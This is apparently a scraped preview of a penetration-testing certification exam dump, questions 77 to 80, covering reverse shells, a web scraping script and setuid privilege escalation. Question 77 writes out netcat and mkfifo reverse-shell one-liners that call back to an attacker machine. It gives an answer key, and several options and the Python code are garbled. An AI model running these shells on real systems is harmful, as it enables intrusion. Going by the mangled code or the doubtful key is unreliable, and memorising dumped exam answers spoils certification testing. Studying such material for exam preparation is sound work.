Question 77 during a web application assessment a

This preview shows page 37 - 39 out of 61 pages.

Question: 77 During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO) A. nc 192.168.1.5 44444 B. nc -nlvp 4444 -e /bin/sh C. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.1.5 44444>/tmp /f D. nc -e /bin/sh 192.168.1.5 4444 E. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.1.5 444444>/tmp /f F. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh –I 2>&1|nc 192.168.5.1 44444>/tmp /f Answer: DF
Question: 78 A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
Question: 79 A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Give the below code and output Import requests
Questions & Answers PDF P- 38 from BeautifulSoup import BeautifulSoup request = requests.get (“ ”) respHeaders, respBody = request[0]. Request[1] if respHeader.statuscode == 200: soup = BeautifulSoup (respBody) soup = soup.FindAll (“div”, (“type” : “hidden”)) print respHeader. StatusCode, StatusMessage else: print respHeader. StatusCode, StatusMessage Output: 200 OK Which of the following is the tester intending to do?
Question: 80 After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s folder titled “changepass” -sr –xr -x 1 root root 6443 Oct 18 2017 /home/user/changepass Using “strings” to print ASCII printable characters from changepass, the tester notes the following: $ strings changepass Exit setuid strmp GLINC _2.0 ENV_PATH %s/changepw malloc strlen Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture